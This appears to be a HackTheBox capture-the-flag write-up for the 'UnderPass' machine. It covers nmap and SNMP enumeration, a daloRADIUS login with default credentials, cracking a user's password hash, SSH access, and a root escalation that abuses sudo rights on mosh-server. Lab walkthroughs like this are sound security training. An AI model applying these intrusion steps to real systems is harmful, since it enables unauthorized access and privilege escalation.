# UnderPass Hackthebox Writeup An easy box from HTB, we first get access to daloradius with weak credentials using them to expose a potential user with his hashed (weak) password, I crack the password ending up getting the plaintext password and we use the password to login to the host via SSH! Easy Win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). 🚀 ## Enumeration I start off with my nmap-scan: ```shell ➜ nmap -sS -sV -sC 10.10.11.48 -oN nmap-scan Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:32 EAT Nmap scan report for 10.10.11.48 Host is up (0.14s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA) |_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds ``` We find that there are 2 ports, running a directory search won't reveal anything juicy, thus I proceed to run UDP scan with nmap: ```shell ➜ nmap -sU -sV --top-ports=10 10.10.11.48 Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 01:42 EAT Nmap scan report for 10.10.11.48 Host is up (0.14s latency). PORT STATE SERVICE VERSION 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Service Info: Host: UnDerPass.htb is the only daloradius server in the basin! Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds ``` We can see that port 161 running SNMP is open and checking the `Service Info` it reveals the host's name and some other information. ### SNMP Enumeration You can learn more on SNMP Pentesting from [here](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html). I use `snmpbulkwalk` to enumerate for to access the data from available OIDs: ```shell snmpbulkwalk -c public -v2c 10.10.11.48 . ``` ![image](https://hackmd.io/_uploads/SJFwD-3leg.png) We get two interesting things from the output: 1. steve@underpass.htb 2. Hex String (07E90509163303002B0000) 3. "UnDerPass.htb is the only daloradius server in the basin!" This is the second time daloradius shows up, searching it up on the browser you should find that it's a Web Management Application: ![image](https://hackmd.io/_uploads/S1PNFZ3gll.png) Trying to access it from port 80, brought forbidden! ## Initial Foothold Reviewing the [github repository](https://github.com/lirantal/daloradius) we can easily identify the login path, and there is an [issue](https://github.com/lirantal/daloradius/issues/573) displaying the default credentials that are expected to be used to login. Thus I proceed to access the operator's login page and use the credentials `administrator:radius`: ![image](https://hackmd.io/_uploads/HJTMjZ3egx.png) Listing the users available we get a user named `svcMosh` with a hashed password: ![image](https://hackmd.io/_uploads/SyOJh-2glg.png) Using either john, hashcat, or crackstation whichever tool of your choice, you can easily crack the hash and get the plaintext password as : `underwaterfriends` ![image](https://hackmd.io/_uploads/S1wVnZ3gxl.png) Using the credentials `svcMosh:underwaterfriends` we are able to login via SSH: ![image](https://hackmd.io/_uploads/B1x02-3lxl.png) ## Privilege Escalation The user is found to have sudo priviles on the binary `/usr/bin/mosh-server`: ```shell svcMosh@underpass:~$ sudo -l Matching Defaults entries for svcMosh on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User svcMosh may run the following commands on localhost: (ALL) NOPASSWD: /usr/bin/mosh-server ``` So basically [mosh](https://mosh.org/) is a remote terminal tool, "a replacement for interactive SSH terminals". You can easily review the [documentation](https://mosh.org/#techinfo) to learn how it works and how you can connect back to the mosh-server after starting it! We first install mosh on our host with the commands below: ```shell sudo apt-get install mosh ``` We then proceed to run mosh server on port 61337 with the commands `sudo mosh-server new -p 61337` and then on our host we proceed to connect back to it with the command `MOSH_KEY={VALUE_OF_KEY} mosh-client 10.10.11.48 61337`, and we will be able to get an interactive shell session as root! ![image](https://hackmd.io/_uploads/B120lfnglx.png) --- ***📨 Got a feedback? [contact me](mailto:iam@tahaafarooq.dev) 📨*** ***☕ Like this content? Consider [buying me a coffee](https://buymeacoffee.com/tahaafarooq) ☕***